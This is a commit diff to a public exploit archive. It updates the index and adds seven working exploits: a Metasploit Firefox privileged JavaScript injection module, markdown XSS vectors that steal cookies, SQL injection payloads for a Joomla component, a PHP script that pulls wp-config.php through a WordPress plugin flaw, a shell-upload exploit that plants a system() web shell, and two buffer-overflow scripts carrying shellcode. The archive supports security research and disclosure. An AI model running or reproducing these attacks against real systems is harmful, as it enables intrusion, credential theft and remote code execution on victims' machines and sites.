DB: 2015-03-25

7 new exploits

files.csv

@@ -32295,7 +32295,6 @@ id,file,description,date,author,platform,type,port
 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
 35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
-35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
 35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
@@ -32883,6 +32882,10 @@ id,file,description,date,author,platform,type,port
 36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
 36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0
+36463,platforms/php/webapps/36463.txt,"Telescope <= 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0
+36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection Vulnerability",2015-03-22,"Manish Tanwar",php,webapps,0
+36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
+36466,platforms/php/webapps/36466.txt,"Wordpress Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting Vulnerability",2011-12-19,G13,php,webapps,0
 36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection Vulnerability",2011-12-20,CoBRa_21,php,webapps,0
 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 'show_errors' Parameter HTML Injection Vulnerability",2011-12-20,"Stefan Schurtz",php,webapps,0
@@ -32892,3 +32895,6 @@ id,file,description,date,author,platform,type,port
 36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-21,Vulnerability-Lab,hardware,remote,0
 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption Vulnerability",2011-12-21,"Vulnerability Research Laboratory",windows,local,0
+36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
+36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
+36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0

platforms/multiple/remote/36480.rb

@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/exploitation/jsobfu'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Firefox Proxy Prototype Privileged Javascript Injection',
+      'Description'    => %q{
+        This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect
+        component and gaining a reference to the privileged chrome:// window. This exploit
+        requires the user to click anywhere on the page to trigger the vulnerability.
+      },
+      'License' => MSF_LICENSE,
+      'Author'  => [
+        'joev' # discovery and metasploit module
+      ],
+      'DisclosureDate' => "Jan 20 2014",
+      'References' => [
+        ['CVE', '2014-8636'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],
+        ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]
+
+      ],
+      'Targets' => [
+        [
+          'Universal (Javascript XPCOM Shell)', {
+            'Platform' => 'firefox',
+            'Arch' => ARCH_FIREFOX
+          }
+        ],
+        [
+          'Native Payload', {
+            'Platform' => %w{ java linux osx solaris win },
+            'Arch'     => ARCH_ALL
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(31, 34) }
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_response_html(cli, generate_html(target_info))
+  end
+
+  def default_html
+    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
+  end
+
+  def generate_html(target_info)
+    key = Rex::Text.rand_text_alpha(5 + rand(12))
+    frame = Rex::Text.rand_text_alpha(5 + rand(12))
+    r = Rex::Text.rand_text_alpha(5 + rand(12))
+    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+    js = js_obfuscate %Q|
+      var opts = #{JSON.unparse(opts)};
+      var key = opts['#{key}'];
+      var props = {};
+      props.has = function(n){
+        if (!window.top.x && n=='nodeType') {
+          window.top.x=window.open("chrome://browser/content/browser.xul", "x",
+            "chrome,,top=-9999px,left=-9999px,height=100px,width=100px");
+          if (window.top.x) {
+            Object.setPrototypeOf(document, pro);
+            setTimeout(function(){
+              x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
+
+              setTimeout(function(){
+                x.messageManager.loadFrameScript('data:,'+key, false);
+                setTimeout(function(){
+                  x.close();
+                }, 100)
+              }, 100)
+            }, 100);
+          }
+        }
+      }
+      var pro = Object.getPrototypeOf(document);
+      Object.setPrototypeOf(document, Proxy.create(props));
+    |
+
+    %Q|
+      <!doctype html>
+      <html>
+        <body>
+          <script>
+            #{js}
+          </script>
+          #{datastore['CONTENT'] || default_html}
+        </body>
+      </html>
+    |
+  end
+end

platforms/php/webapps/36463.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Persistent XSS via Markdown on Telescope  <= 0.9.2
+# Date: Aug 22 2014
+# Exploit Author: shubs
+# Vendor Homepage: http://www.telescopeapp.org/
+# Software Link: https://github.com/TelescopeJS/Telescope
+# Version: <= 0.9.2
+# CVE : CVE-2014-5144
+
+Telescope 0.9.2 and below suffer from a persistent cross site scripting
+vulnerability due to the lack of input sanitisation and validation
+performed when parsing markdown user input. An authenticated user can
+include links, images, code blocks and more through markdown, in the form
+of comments, posts or replies and more.
+
+As an example, the following vectors below can be used in comments, posts
+or replies to trigger the XSS:
+
+[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
+[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
+
+Once posted as comments, the above markdown is converted to links without
+any sanitisation. When such links are clicked, the vector is executed
+successfully.
+
+Screenshots:
+http://i.imgur.com/6SQgUYd.png
+http://i.imgur.com/6VeZasj.png

platforms/php/webapps/36464.txt

@@ -0,0 +1,71 @@
+##################################################################################################
+#Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability
+#Author        : Manish Kishan Tanwar AKA error1046
+#Vendor Link   : http://demo.web-dorado.com/spider-faq.html
+#Date          : 21/03/2015
+#Discovered at : IndiShell Lab
+#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
+#Discovered At : Indishell Lab
+##################################################################################################
+
+////////////////////////
+/// Overview:
+////////////////////////
+
+
+joomla component Spider FAQ is not filtering data in theme and Itemid parameters
+and hence affected from SQL injection vulnerability 
+
+///////////////////////////////
+// Vulnerability Description:
+///////////////////////////////
+vulnerability is due to theme and Itemid parameter 
+
+////////////////
+///  POC   ////
+///////////////
+
+POC image=http://oi57.tinypic.com/2rh1zk7.jpg
+
+SQL Injection in theme parameter
+=================================
+
+Use error based double query injection with theme parameter
+Like error based double query injection for exploiting username --->
+and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - 
+
+Injected Link--->
+http://website.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4 and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - &searchform=1&expand=0&Itemid=109
+
+
+SQL Injection in Itemid parameter
+=================================
+
+Itemid Parameter is exploitable using xpath injection 
+
+User extraction payload
+------------------------
+' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- -
+
+crafted URL--->
+http://localhostm/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- -
+
+Table extraction
+-----------------
+' and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- -
+
+Crafted URL---->
+http://localhost/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- -
+
+                             --==[[ Greetz To ]]==--
+############################################################################################
+#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 
+#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
+#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
+#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
+#############################################################################################
+                             --==[[Love to]]==--
+# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
+#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
+                       --==[[ Special Fuck goes to ]]==--
+                            <3  suriya Cyber Tyson <3

platforms/php/webapps/36466.txt

@@ -0,0 +1,117 @@
+# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
+# Date: 26-10-2014
+# Software Link: https://wordpress.org/plugins/wpmarketplace/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+# CVE: CVE-2014-9013 and CVE-2014-9014
+
+1. Description
+
+Anyone can run user defined function because of call_user_func.
+
+File: wpmarketplace\libs\cart.php
+
+function ajaxinit(){
+if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
+	if(function_exists($_POST['execute']))
+		call_user_func($_POST['execute'],$_POST);
+	else
+		echo __("function not defined!","wpmarketplace");
+	die();
+	}
+}
+
+http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html
+
+2. Proof of Concept
+
+$file =  '../../../wp-config.php';
+$url = 'http://wordpress-url/';
+$user = 'userlogin';
+$email = 'useremail@email.email';
+$pass = 'password';
+$cookie = "/cookie.txt";
+
+$ckfile = dirname(__FILE__) . $cookie;
+$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
+
+// Register
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
+curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
+curl_setopt($ch, CURLOPT_TIMEOUT, 10);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_POST, 1);
+curl_setopt($ch,
+    CURLOPT_POSTFIELDS,
+    array(
+        'register_form' => 'register',
+        'reg[user_login]' => $user,
+        'reg[user_email]' => $email,
+        'reg[user_pass]' => $pass
+    ));
+$content = curl_exec($ch);
+if (!preg_match("/success/i", $content)) {
+    die("Cannot register");
+}
+// Log in
+curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
+curl_setopt($ch,
+    CURLOPT_POSTFIELDS,
+    array(
+        'log' => $user,
+        'pwd' => $pass,
+        'wp-submit' => 'Log%20In'
+    ));
+$content = curl_exec($ch);
+if (!preg_match('/adminmenu/i', $content)) {
+    die("Cannot login");
+}
+// Add subscriber as plugin admin
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch,
+    CURLOPT_POSTFIELDS,
+    array(
+        'action' => 'wpmp_pp_ajax_call',
+        'execute' => 'wpmp_save_settings',
+        '_wpmp_settings[user_role][]' => 'subscriber'
+    ));
+$content = curl_exec($ch);
+if (!preg_match('/Settings Saved Successfully/i', $content)) {
+    die("Cannot set role");
+}
+// Request noonce
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch,
+    CURLOPT_POSTFIELDS,
+    array(
+        'action' => 'wpmp_pp_ajax_call',
+        'execute' => 'wpmp_front_add_product'
+    ));
+$content = curl_exec($ch);
+preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
+if (strlen($nonce[1]) < 2) {
+    die("Cannot get nonce");
+}
+// Set file to download
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch,
+    CURLOPT_POSTFIELDS,
+    array(
+        '__product_wpmp' => $nonce[1],
+        'post_type' => 'wpmarketplace',
+        'id' => '123456',
+        'wpmp_list[base_price]' => '0',
+        'wpmp_list[file][]' => $file
+    ));
+$content = curl_exec($ch);
+header("Location: ".$url."?wpmpfile=123456");
+
+3. Solution:
+
+Update to version 2.4.1
+
+https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip

platforms/php/webapps/36478.php

@@ -0,0 +1,92 @@
+<?php
+###########################################
+#-----------------------------------------#
+#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
+#-----------------------------------------#
+#     *----------------------------*      #
+#  K  |....##...##..####...####....|  .   #
+#  h  |....#...#........#..#...#...|  A   #
+#  a  |....#..#.........#..#....#..|  N   #
+#  l  |....###........##...#.....#.|  S   #
+#  E  |....#.#..........#..#....#..|  e   #
+#  D  |....#..#.........#..#...#...|  u   #
+#  .  |....##..##...####...####....|  r   #
+#     *----------------------------*      #
+#-----------------------------------------#
+#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
+#-----------------------------------------#
+###########################################
+# >>    D_x . Made In Algeria . x_Z    << #
+###########################################
+#
+# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
+#
+# [>] Author : KedAns-Dz
+# [+] E-mail : ked-h (@hotmail.com)
+# [+] FaCeb0ok : fb.me/K3d.Dz
+# [+] TwiTter : @kedans
+#
+# [#] Platform : PHP / WebApp
+# [+] Cat/Tag : File Upload / Code Exec
+#
+# [<] <3 <3 Greetings t0 Palestine <3 <3
+# [!] Vendor : http://www.inboundio.com
+#
+###########################################
+#
+# [!] Description :
+#
+# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability
+# remote attacker can upload file/shell/backdoor and exec commands.
+#
+####
+# Lines (6... to 20) : csv_uploader.php
+####
+#
+# ExpLO!T : 
+# -------
+
+$postData = array();
+$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
+
+$dz = curl_init();
+curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
+curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+curl_setopt($dz, CURLOPT_POST, 1);
+curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
+curl_setopt($dz, CURLOPT_TIMEOUT, 0);
+$buf = curl_exec ($dz);
+curl_close($dz);
+unset($dz);
+echo $buf;
+
+/*
+[!] creat your shell file =>
+ _ k3dz.php :
+
+ <?php system($_GET['dz']); ?>
+ 
+[>] Post the exploit 
+[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
+[+] Or upload what you whant ^_^ ...
+
+*/
+
+####
+#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
+#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
+#---------------------------------------------------------------
+# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
+# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
+# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
+# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
+# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
+# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
+# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
+####
+
+# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html
+
+?>
+
+

platforms/windows/local/36465.py

@@ -0,0 +1,31 @@
+#!/usr/bin/python
+ 
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
+#[+] Date: 20-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+
+## EDB Note: Didn't work with Windows 7.
+
+from struct import pack
+file="evilfile.wav"
+junk="\x41"*4112
+eip = pack('<I',0x7C9D30D7)
+nops = "\x90" * 3
+#Calc.exe Shellcode
+#POC:http://youtu.be/_uvHKonqO2g
+shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
+"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
+"\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
+"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd"
+"\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8"
+"\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5"
+"\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
+"\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")
+writeFile = open (file, "w")
+writeFile.write(junk+eip+nops+shellcode)
+writeFile.close()

platforms/windows/remote/36477.py

@@ -0,0 +1,64 @@
+#!/usr/bin/python
+
+''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
+In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
+address and then used backward jumping to jump to a long jump that eventually land in my shellcode.
+
+Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)
+
+My twitter: @fady_osman
+My youtube: https://www.youtube.com/user/cutehack3r
+'''
+
+import socket
+import sys
+s = socket.socket()         # Create a socket object
+if(len(sys.argv) < 3):
+  print "[x] Please enter an IP and port to listen to."
+  print "[x] " + sys.argv[0] + " ip port"
+  exit()
+host = sys.argv[1]	    # Ip to listen to.
+port = int(sys.argv[2])     # Reserve a port for your service.
+s.bind((host, port))        # Bind to the port
+print "[*] Listening on port " + str(port)
+s.listen(5)                 # Now wait for client connection.
+c, addr = s.accept()        # Establish connection with client.
+# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
+print(('[*] Sending the payload first time', addr))
+c.recv(1024)
+#seh and nseh.
+buf =  ""
+buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
+buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
+buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
+buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
+buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
+buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
+buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
+buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
+buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
+buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
+buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
+buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
+buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
+buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
+buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
+buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
+buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
+buf += "\x8c\xcd\x11\xc2\x37\x12"
+
+jmplong = "\xe9\x85\xe9\xff\xff"
+nseh = "\xeb\xf9\x90\x90"
+# Partially overwriting the seh record (nulls are ignored).
+seh = "\x3b\x58\x00\x00"
+buflen = len(buf)
+response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000
+c.send(response)
+c.close()
+c, addr = s.accept()        # Establish connection with client.
+# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
+print(('[*] Sending the payload second time', addr))
+c.recv(1024)
+c.send(response)
+c.close()
+s.close()